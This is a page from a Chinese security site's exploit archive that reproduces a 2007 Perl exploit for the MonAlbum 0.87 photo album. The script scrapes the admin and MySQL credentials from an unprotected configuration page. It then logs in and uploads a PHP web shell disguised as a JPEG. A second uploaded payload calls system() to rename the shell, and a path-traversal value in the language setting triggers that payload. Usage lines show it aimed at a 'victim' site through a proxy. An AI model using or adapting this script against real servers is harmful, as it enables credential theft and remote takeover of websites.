首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MonAlbum 0.87 Upload Shell / Password Grabber Exploit
来源:www.vfocus.net 作者:v0l4arrra 发布时间:2007-12-12  
#!/usr/bin/env perl
use strict; use warnings;
###############################################
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Std;

my (%args, $user, $password, $sql_host, $sql_user, $sql_password, $cookie, $path, $file, $upload)  = ();
my $tmp = 'cmd1.jpg';

getopts("u:a:f:p:", \%args);
#######################################################################
# -a don't retrieve login and passwords, use from command line instead#
# -u vuln url                                                         #
# -f local php-shell                                                  #
# -p http proxy                                                       #
#######################################################################

if(!$args{u}) { &usage(); exit(0);}

if(defined $args{a}){
($user,$password) = split(':',$args{a});
}

if(!$args{a}){
my $ua= new LWP::UserAgent;
$ua->agent("Mozilla/5.0");
if(defined $args{p}){$ua->proxy('http', "http://$args{p}");}
$ua->max_redirect(0);
$args{u} =~ s%/$%%i;
my $request = new HTTP::Request( 'GET' => "$args{u}"."/admin/admin_configuration.php");
my $document = $ua->request($request);
my $response = $document->as_string;
$response =~ m%<input type="text" name="gadm_user" value="(.*?)">%is;
$user = $1;
$response =~ m%<input type="password" name="gadm_pass" value="(.*?)">%is;
$password = $1;
$response =~ m%<input type="text" name="gcfgHote" value="(.*?)">%is;
$sql_host = $1;
$response =~ m%<input type="text" name="gcfgUser" value="(.*?)">%is;
$sql_user = $1;
$response =~ m%<input type="password" name="gcfgPass" value="(.*?)">%is;
$sql_password = $1;
print("########################################################################\n");
if(defined $user && defined $password){
print "#Admin Panel: $user\t$password                                         \n";
print("########################################################################\n");
print "#Mysql Details: $sql_host\t$sql_user\t$sql_password                    \n";
}else{
print "#Failed...                                                             #\n";
exit(0);
}
}

goto _EXIT_ unless defined $args{f};

my $ua= new LWP::UserAgent;
$ua->agent("Mozilla/5.0");
if(defined $args{p}){$ua->proxy('http', "http://$args{p}");}
$args{u} =~ s%/$%%i;
my $request = HTTP::Request::Common::POST(
"$args{u}/admin/login_page.php",
Content_Type => 'application/x-www-form-urlencoded',
Referer => "$args{u}/admin/login_page.php",
Content => [
login_adm => "$user",
pass_adm => "$password",
send => "Enter"
]
);
my $document = $ua->request($request);
my $response = $document->as_string;
if($response =~ m/document\.location\.replace\(\'\.\.\/admin\.php\'\)/i){
print("########################################################################\n");
print "#Login successfull                                                     #\n";
$response =~ m%Set-Cookie: (.*?);%is;
$cookie = $1;
}else{
print("########################################################################\n");
print "#Login failed                                                          #\n";
goto _EXIT_;
}

$ua->default_headers->push_header('Cookie' => "$cookie");
$request = new HTTP::Request( 'GET' => "$args{u}"."/admin/admin_ajouter_img.php");
$document = $ua->request($request);
$response = $document->as_string;
$response =~ m%<form ENCTYPE='multipart/form-data'  method='post' action=(.*?)>%i;
$upload = $1;

$request = HTTP::Request::Common::POST(
"$args{u}/admin/$upload",
Content_Type => 'multipart/form-data',
Referer => "$args{u}/admin/admin_ajouter_img.php",
Content => [
MAX_FILE_SIZE => "1000000",
userfile => [$args{f}],
Content_Type => "image/jpeg"
]
);

$document = $ua->request($request);
$response = $document->as_string;
#print $response;

$response =~ m%is not a valid JPEG file in <b>(.*?)<\/b>%i;
#/var/www/web70/html/monalbum/admin/admin_ajouter_img.php
#print $1;
$path = $1;
$path =~ s%/admin/admin_ajouter_img\.php%%i;
$path .= "/images";
#print $path;

$args{f} =~ m/([\w\.\-]+)$/i;
$file = $1;

open TEMP,">$tmp" || die "Can't open $tmp: $!\n";
print TEMP "<?php system(\"mv $path/$file $path/$file.php\"); die(); ?>";
close(TEMP);

$request = HTTP::Request::Common::POST(
"$args{u}/admin/$upload",
Content_Type => 'multipart/form-data',
Referer => "$args{u}/admin/admin_ajouter_img.php",
Content => [
MAX_FILE_SIZE => "1000000",
userfile => [$tmp],
Content_Type => "image/jpeg"
]
);

$document = $ua->request($request);
$request = HTTP::Request::Common::POST(
"$args{u}/admin/admin_configuration.php",
Content_Type => 'multipart/form-data',
Referer => "$args{u}/admin/admin_configuration.php",
Content => [
glangage => "../images/$tmp",
Save => "Save"
]
);
$document = $ua->request($request);
$ua->max_redirect(0);
$request = new HTTP::Request( 'HEAD' => "$args{u}/images/$file.php");
$document = $ua->request($request);


if($document->is_success){
print("########################################################################\n");
print "#Shell Uploaded Successfull!                                           #\n";
print "#U may now try: $args{u}/images/$file.php                              \n";
}else{
print("########################################################################\n");
print "#Something went wrong!!!                                               #\n";
}

_EXIT_:
unlink($tmp);
print("########################################################################\n");
exit(0);

sub usage
{
print("###########################################################################
# -a using account from command line                                      #
# -u vuln url                                                             #
# -f local php-shell  (optional)                                          #
# -p http proxy       (optional)                                          #
###########################################################################
# : perl sp.pl -u http://victim.com/monalbum/ -p 75.34.123.215:9629       #
# : perl sp.pl -u http://victim.com/monalbum/ -f shell.jpg                #
# : perl sp.pl -u http://victim.com/monalbum/ -a admin:admin -f shell.jpg #
# this lame script was coded by v0l4arrra                                 #
###########################################################################
"
);
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nullsoft Winamp 5.32 MP4 tags
·Online Media Technologies AVSM
·Windows Media Player 6.4 MP4 F
·Simple HTTPD 1.3 (/aux) Remote
·Media Player Classic 6.4.9 MP4
·SquirrelMail G/PGP Plugin dele
·Send ICMP Nasty Garbage (sing)
·Apple Mac OS X xnu <= 1228.0 L
·Cisco Phone 7940 Remote Denial
·HP OpenView Network Node Manag
·Apple Mac OS X 10.5.0 (leopard
·Adult Script <= 1.6 Unauthoriz
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved